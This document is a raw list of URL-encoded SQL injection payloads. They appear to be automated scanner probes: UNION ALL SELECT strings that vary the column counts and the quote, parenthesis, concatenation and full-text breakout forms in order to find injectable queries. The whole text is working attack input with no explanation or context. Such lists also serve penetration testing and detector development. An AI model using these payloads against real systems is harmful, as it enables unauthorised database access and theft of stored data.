1%22%20WHERE%204027%3D4027%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%209370%3D9370%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%203331%3D3331%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%206642%3D6642%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%202832%3D2832%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20WHERE%208280%3D8280%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27ehoa%27%20FROM%20DUAL%20WHERE%204429%3D4429%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27HxhH%27%20FROM%20DUAL%20WHERE%206573%3D6573%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27dOsu%27%20FROM%20DUAL%20WHERE%206180%3D6180%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27OmQc%27%20FROM%20DUAL%20WHERE%203770%3D3770%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27fBhk%27%20FROM%20DUAL%20WHERE%206308%3D6308%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27VnoF%27%20FROM%20DUAL%20WHERE%201231%3D1231%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27uhbQ%27%20FROM%20DUAL%20WHERE%209375%3D9375%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27PJuj%27%20FROM%20DUAL%20WHERE%201012%3D1012%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27NWyp%27%20FROM%20DUAL%20WHERE%206199%3D6199%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27qOdU%27%20FROM%20DUAL%20WHERE%205960%3D5960%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27lgwm%27%20WHERE%207416%3D7416%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27mZKZ%27%20WHERE%207507%3D7507%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27nuff%27%20WHERE%209263%3D9263%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27gxyL%27%20WHERE%203410%3D3410%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27ZtUU%27%20WHERE%202297%3D2297%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27dQgh%27%20WHERE%204058%3D4058%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27OpQX%27%20WHERE%208245%3D8245%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27XQMn%27%20WHERE%209737%3D9737%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27ifhC%27%20WHERE%201501%3D1501%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27NFGS%27%20WHERE%207691%3D7691%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20HJKQ%20WHERE%203802%3D3802%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20wysp%20WHERE%203848%3D3848%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20ryPb%20WHERE%207587%3D7587%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20thOe%20WHERE%204133%3D4133%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20ZUsP%20WHERE%203669%3D3669%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20jbtv%20WHERE%202484%3D2484%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20AbBQ%20WHERE%207769%3D7769%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20TEZW%20WHERE%204921%3D4921%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20RlwV%20WHERE%209766%3D9766%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20qLHZ%20WHERE%205342%3D5342%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27vMUK%27%20WHERE%206980%3D6980%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27xUIb%27%20WHERE%202615%3D2615%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27wCCd%27%20WHERE%205273%3D5273%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27AtoL%27%20WHERE%207164%3D7164%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27zlHP%27%20WHERE%209800%3D9800%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27zpCP%27%20WHERE%201215%3D1215%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27cnsq%27%20WHERE%209988%3D9988%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27wXFd%27%20WHERE%205305%3D5305%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27NRCI%27%20WHERE%209418%3D9418%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27sFJp%27%20WHERE%206598%3D6598%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 -9576%29%20UNION%20ALL%20SELECT%205216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%23 -7772%29%20UNION%20ALL%20SELECT%201461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%23 -8030%29%20UNION%20ALL%20SELECT%209799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%23 -7908%29%20UNION%20ALL%20SELECT%201515%2C1515%2C1515%2C1515%2C1515%2C1515%2C1515%2C1515%2C1515%2C1515%2C1515%2C1515%2C1515%2C1515%2C1515%2C1515%2C1515%2C1515%2C1515%2C1515%2C1515%2C1515%2C1515%2C1515%23 -8371%29%20UNION%20ALL%20SELECT%203615%2C3615%2C3615%2C3615%2C3615%2C3615%2C3615%2C3615%2C3615%2C3615%2C3615%2C3615%2C3615%2C3615%2C3615%2C3615%2C3615%2C3615%2C3615%2C3615%2C3615%2C3615%2C3615%2C3615%2C3615%23 -1823%29%20UNION%20ALL%20SELECT%209336%2C9336%2C9336%2C9336%2C9336%2C9336%2C9336%2C9336%2C9336%2C9336%2C9336%2C9336%2C9336%2C9336%2C9336%2C9336%2C9336%2C9336%2C9336%2C9336%2C9336%2C9336%2C9336%2C9336%2C9336%2C9336%23 -2959%29%20UNION%20ALL%20SELECT%203381%2C3381%2C3381%2C3381%2C3381%2C3381%2C3381%2C3381%2C3381%2C3381%2C3381%2C3381%2C3381%2C3381%2C3381%2C3381%2C3381%2C3381%2C3381%2C3381%2C3381%2C3381%2C3381%2C3381%2C3381%2C3381%2C3381%23 -3246%29%20UNION%20ALL%20SELECT%202526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%2C2526%23 -7797%29%20UNION%20ALL%20SELECT%204037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%23 -2526%29%20UNION%20ALL%20SELECT%204399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%23 -1173%29%20UNION%20ALL%20SELECT%203887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%23 -8733%29%20UNION%20ALL%20SELECT%207463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%23 -5800%29%20UNION%20ALL%20SELECT%207721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%2C7721%23 -7955%29%20UNION%20ALL%20SELECT%204324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%23 -1865%29%20UNION%20ALL%20SELECT%208498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%2C8498%23 -2767%29%20UNION%20ALL%20SELECT%204982%2C4982%2C4982%2C4982%2C4982%2C4982%2C4982%2C4982%2C4982%2C4982%2C4982%2C4982%2C4982%2C4982%2C4982%2C4982%2C4982%2C4982%2C4982%2C4982%2C4982%2C4982%2C4982%2C4982%2C4982%2C4982%23 -9749%29%20UNION%20ALL%20SELECT%206757%2C6757%2C6757%2C6757%2C6757%2C6757%2C6757%2C6757%2C6757%2C6757%2C6757%2C6757%2C6757%2C6757%2C6757%2C6757%2C6757%2C6757%2C6757%2C6757%2C6757%2C6757%2C6757%2C6757%2C6757%2C6757%2C6757%23 -8516%29%20UNION%20ALL%20SELECT%202260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%2C2260%23 -7321%29%20UNION%20ALL%20SELECT%209015%2C9015%2C9015%2C9015%2C9015%2C9015%2C9015%2C9015%2C9015%2C9015%2C9015%2C9015%2C9015%2C9015%2C9015%2C9015%2C9015%2C9015%2C9015%2C9015%2C9015%2C9015%2C9015%2C9015%2C9015%2C9015%2C9015%2C9015%2C9015%23 -2685%29%20UNION%20ALL%20SELECT%201018%2C1018%2C1018%2C1018%2C1018%2C1018%2C1018%2C1018%2C1018%2C1018%2C1018%2C1018%2C1018%2C1018%2C1018%2C1018%2C1018%2C1018%2C1018%2C1018%2C1018%2C1018%2C1018%2C1018%2C1018%2C1018%2C1018%2C1018%2C1018%2C1018%23 -3583%29%29%20UNION%20ALL%20SELECT%205465%2C5465%2C5465%2C5465%2C5465%2C5465%2C5465%2C5465%2C5465%2C5465%2C5465%2C5465%2C5465%2C5465%2C5465%2C5465%2C5465%2C5465%2C5465%2C5465%2C5465%23 -6313%29%29%20UNION%20ALL%20SELECT%204100%2C4100%2C4100%2C4100%2C4100%2C4100%2C4100%2C4100%2C4100%2C4100%2C4100%2C4100%2C4100%2C4100%2C4100%2C4100%2C4100%2C4100%2C4100%2C4100%2C4100%2C4100%23 -6391%29%29%20UNION%20ALL%20SELECT%204789%2C4789%2C4789%2C4789%2C4789%2C4789%2C4789%2C4789%2C4789%2C4789%2C4789%2C4789%2C4789%2C4789%2C4789%2C4789%2C4789%2C4789%2C4789%2C4789%2C4789%2C4789%2C4789%23 